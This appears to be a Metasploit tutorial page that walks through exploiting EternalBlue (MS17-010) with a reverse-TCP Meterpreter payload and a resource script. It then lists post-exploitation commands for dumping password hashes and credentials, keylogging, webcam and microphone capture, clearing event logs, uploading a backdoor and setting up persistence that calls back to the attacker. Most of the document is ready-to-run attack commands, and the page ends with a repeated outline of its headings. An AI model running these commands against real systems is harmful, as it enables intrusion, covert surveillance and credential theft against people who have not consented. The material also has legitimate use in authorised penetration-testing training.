05. Metasploit Exploitation

Metasploit Framework (MSF) is a modular framework that simplifies the process of discovering vulnerabilities, exploiting them, and conducting post-exploitation tasks. Here’s a detailed explanation of each step and command used in Metasploit.

1. Starting Metasploit Framework¶

Command:¶

msfconsole

This starts the Metasploit console, the main interface for interacting with the framework.

Details:¶

The console is text-based and provides access to a range of commands and modules.
Once loaded, you’ll see a banner and the msf > prompt, indicating readiness for commands.

2. Searching for Vulnerabilities¶

Command Examples:¶

search cve:<CVE-ID>
search type:exploit platform:windows name:smb

Details:¶

search helps locate modules, exploits, auxiliary tools, and payloads.
Filters:
- cve:<CVE-ID>: Search by Common Vulnerabilities and Exposures identifier.
- type:<type>: Narrow by type, such as exploit or auxiliary.
- platform:<platform>: Filter modules based on the target platform (e.g., Windows, Linux).
- name:<keyword>: Search by keyword.

Example: Searching for EternalBlue (CVE-2017-0143):

search eternalblue

3. Selecting and Configuring an Exploit¶

Command:¶

use exploit/<module-path>

Details:¶

Loads the exploit module into the console for configuration and execution.

Example for EternalBlue:

use exploit/windows/smb/ms17_010_eternalblue

4. Setting Module Options¶

Command Examples:¶

show options
set RHOST <target-IP>
set RPORT <target-port>

Details:¶

show options: Lists required and optional parameters for the module.
set: Configures parameters.
- RHOST: Remote Host (target’s IP address).
- RPORT: Remote Port (service port on the target, e.g., 445 for SMB).

Example:

set RHOST 192.168.1.100
set RPORT 445

5. Setting Payload¶

Command Examples:¶

show payloads
set payload <payload-name>

Details:¶

show payloads: Lists compatible payloads for the selected exploit.
set payload: Specifies the payload to execute on the target after exploitation.
Payloads can be:
- windows/meterpreter/reverse_tcp: Opens a reverse Meterpreter shell.
- cmd/unix/reverse_bash: Executes a reverse shell on Unix systems.

Example:

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10  # Your attack machine IP
set LPORT 4444          # Listening port for the reverse shell

6. Running the Exploit¶

Command:¶

exploit / exploit -z

or

run

Details:¶

Attempts to exploit the target using the configured exploit and payload.
The exploit -z command will run the exploit and background the session as soon as it opens.
Successful execution results in a session (e.g., a Meterpreter session).

7. Managing Sessions¶

Command Examples:¶

sessions -l
sessions -i <session-ID>

Details:¶

sessions -l: Lists active sessions.
sessions -i <ID>: Interacts with the specified session.

Upgrading a Shell to a Meterpreter Session¶

After you successfully exploit a target and get an initial shell session, you often need to upgrade it to a Meterpreter session for more advanced post-exploitation tasks. A Meterpreter session provides a much richer and more powerful set of features compared to a standard shell, which is limited to the commands available on the target's operating system.

Why Upgrade to Meterpreter?¶

Stealth and Control: Meterpreter is an in-memory payload, meaning it doesn't write to the disk and is harder to detect. It also allows you to interact with the target system in a more sophisticated way.
Post-Exploitation Modules: Meterpreter offers a wide range of commands and modules for tasks like privilege escalation, dumping credentials, injecting processes, and pivoting to other machines on the network.
Stability: Meterpreter sessions are generally more stable and less prone to crashing than simple shell sessions.
Multiple Channels: You can open multiple channels and interact with different parts of the system simultaneously.

The `shell_to_meterpreter` Module¶

The easiest way to upgrade a simple shell to a Meterpreter session is by using the shell_to_meterpreter post-exploitation module. This module automates the process by injecting a Meterpreter payload into the compromised system.

How to Use It¶

Get a Shell: First, you need to have an active shell session. Let's say your session ID is 1.

msf6 > sessions
Use the Module: Load the shell_to_meterpreter module.

msf6 > use post/multi/manage/shell_to_meterpreter
Set the Session: Specify the session you want to upgrade.

msf6 > set SESSION 1
Run the Exploit: Execute the module.

msf6 > run

After a few moments, the module will inject the Meterpreter payload and open a new session. You should see a message indicating that a new Meterpreter session has been created.

Interact with the New Session: Use the sessions command to see the new Meterpreter session and interact with it.

msf6 > sessions

msf6 > sessions -i 2¶

8. Post-Exploitation with Meterpreter¶

Useful Commands:¶

1. Core Commands

These are used for basic session control and module management.

Command	Purpose	Example
`background`	Send the current session to the background	`meterpreter > background`
`exit`	Terminate the Meterpreter session	`meterpreter > exit`
`guid`	Show session’s Globally Unique Identifier	`meterpreter > guid`
`help`	Display available commands	`meterpreter > help`
`info`	Show information about a post-exploitation module	`meterpreter > info post/windows/gather/enum_shares`
`irb`	Open interactive Ruby shell for custom scripting	`meterpreter > irb`
`load`	Load additional Meterpreter extensions	`meterpreter > load kiwi`
`migrate`	Move Meterpreter into another process for stability/privilege	`meterpreter > migrate 1234` (PID 1234)
`run`	Execute Meterpreter script or post module	`meterpreter > run post/windows/gather/enum_logged_on_users`
`sessions`	List & switch between active sessions	`meterpreter > sessions -i 2`

Tip: migrate is useful to move into a stable process like explorer.exe after exploitation.

2. File System Commands

Used to explore and manipulate the target’s file system.

Command	Purpose	Example
`cd`	Change directory	`meterpreter > cd C:\\Users\\Admin\\Documents`
`ls`	List directory contents	`meterpreter > ls`
`pwd`	Print current working directory	`meterpreter > pwd`
`edit`	Edit a file in target system	`meterpreter > edit notes.txt`
`cat`	Display file content	`meterpreter > cat password.txt`
`rm`	Delete a file	`meterpreter > rm secret.txt`
`search`	Search for files	`meterpreter > search -f *.docx`
`upload`	Upload a file to target	`meterpreter > upload backdoor.exe C:\\Temp`
`download`	Download a file from target	`meterpreter > download C:\\Users\\Admin\\report.pdf`

Example:
To find password files:

meterpreter > search -f *pass*.txt

3. Networking Commands

For inspecting and manipulating the network configuration of the target.

Command	Purpose	Example
`arp`	Display ARP table	`meterpreter > arp`
`ifconfig`	Show network interfaces	`meterpreter > ifconfig`
`netstat`	Display network connections	`meterpreter > netstat`
`portfwd`	Forward a local port to remote service	`meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.10`
`route`	View/modify routing table	`meterpreter > route add 10.0.0.0 255.255.255.0 3`

Use case: portfwd is useful for pivoting into internal networks.

4. System Commands

For process management, system control, and shell access.

Command	Purpose	Example
`clearev`	Clear system event logs	`meterpreter > clearev`
`execute`	Run a command/program	`meterpreter > execute -f notepad.exe`
`getpid`	Show current process PID	`meterpreter > getpid`
`getuid`	Show current user	`meterpreter > getuid`
`kill`	Terminate a process by PID	`meterpreter > kill 1234`
`pkill`	Terminate process by name	`meterpreter > pkill notepad.exe`
`ps`	List running processes	`meterpreter > ps`
`reboot`	Restart target	`meterpreter > reboot`
`shell`	Get system command shell	`meterpreter > shell`
`shutdown`	Shutdown target	`meterpreter > shutdown`
`sysinfo`	Show system info	`meterpreter > sysinfo`

Example:
If Meterpreter is running in a low-privilege process, use:

meterpreter > ps
meterpreter > migrate 4567

5. Other Useful Commands

These commands help with surveillance, privilege escalation, and credential harvesting.

Command	Purpose	Example
`idletime`	Show user idle time	`meterpreter > idletime`
`keyscan_start` / `keyscan_stop` / `keyscan_dump`	Start, stop, dump keystrokes	`meterpreter > keyscan_start`
`screenshare`	View remote desktop in real-time	`meterpreter > screenshare`
`screenshot`	Capture desktop screenshot	`meterpreter > screenshot`
`record_mic`	Record from microphone	`meterpreter > record_mic 10` (10 sec)
`webcam_list` / `webcam_snap` / `webcam_stream`	Webcam control	`meterpreter > webcam_snap 1`
`getsystem`	Attempt privilege escalation to SYSTEM	`meterpreter > getsystem`
`hashdump`	Dump SAM database hashes	`meterpreter > hashdump`

Example for credential harvesting:

meterpreter > load kiwi
meterpreter > kiwi_cmd "creds_all"

6. Post-Exploitation Goals

Using Meterpreter, you can achieve:

Information Gathering – sysinfo, ifconfig, ps, search
File & Credential Harvesting – download, hashdump, keyscan_start
Privilege Escalation – getsystem, migrate into SYSTEM process
Lateral Movement – Use route & portfwd for pivoting
Persistence – Upload and schedule malicious binaries

7. Example Workflow

Scenario: You compromised a Windows target via SMB and want credentials.

# Get system info
meterpreter > sysinfo

# Migrate to explorer.exe for stability
meterpreter > ps
meterpreter > migrate 2124

# Dump password hashes
meterpreter > hashdump

# Search for sensitive docs
meterpreter > search -f *password*.docx

# Download the found files
meterpreter > download C:\\Users\\Admin\\passwords.docx

System Commands:

sysinfo            # Displays target system information
shell              # Opens a shell on the target

File Operations:

ls                 # Lists files in the current directory
download <file>    # Downloads a file from the target
upload <file>      # Uploads a file to the target

Privilege Escalation:

getuid             # Shows the current user ID
getsystem          # Attempts to elevate privileges

Persistence:

run persistence -U -i 10 -p 4444 -r <your-IP>

Sets up persistence by creating a backdoor.

9. Automating Tasks¶

Command:¶

resource <script.rc>

Details:¶

Executes a series of Metasploit commands from a script file.

Example script (script.rc):

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

Example: Exploiting EternalBlue (Full Process)¶

Start Metasploit:
```
msfconsole
```
Search for the Exploit:
```
search eternalblue
```

Select the Exploit:

use exploit/windows/smb/ms17_010_eternalblue

Set Target Details:
```
set RHOST 192.168.1.100
set RPORT 445
```

Set Payload:

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

Run the Exploit:
```
exploit
```

If successful, you’ll get a Meterpreter session. Use the above post-exploitation commands to gather information or maintain access.

05. Metasploit Exploitation

1. Starting Metasploit Framework¶

Command:¶

Details:¶

2. Searching for Vulnerabilities¶

Command Examples:¶

Details:¶

3. Selecting and Configuring an Exploit¶

Command:¶

Details:¶

4. Setting Module Options¶

Command Examples:¶

Details:¶

5. Setting Payload¶

Command Examples:¶

Details:¶

6. Running the Exploit¶

Command:¶

Details:¶

7. Managing Sessions¶

Command Examples:¶

Details:¶

Upgrading a Shell to a Meterpreter Session¶

Why Upgrade to Meterpreter?¶

The shell_to_meterpreter Module¶

How to Use It¶

msf6 > sessions -i 2¶

8. Post-Exploitation with Meterpreter¶

Useful Commands:¶

9. Automating Tasks¶

Command:¶

Details:¶

Example: Exploiting EternalBlue (Full Process)¶

The `shell_to_meterpreter` Module¶

`msf6 > sessions -i 2`¶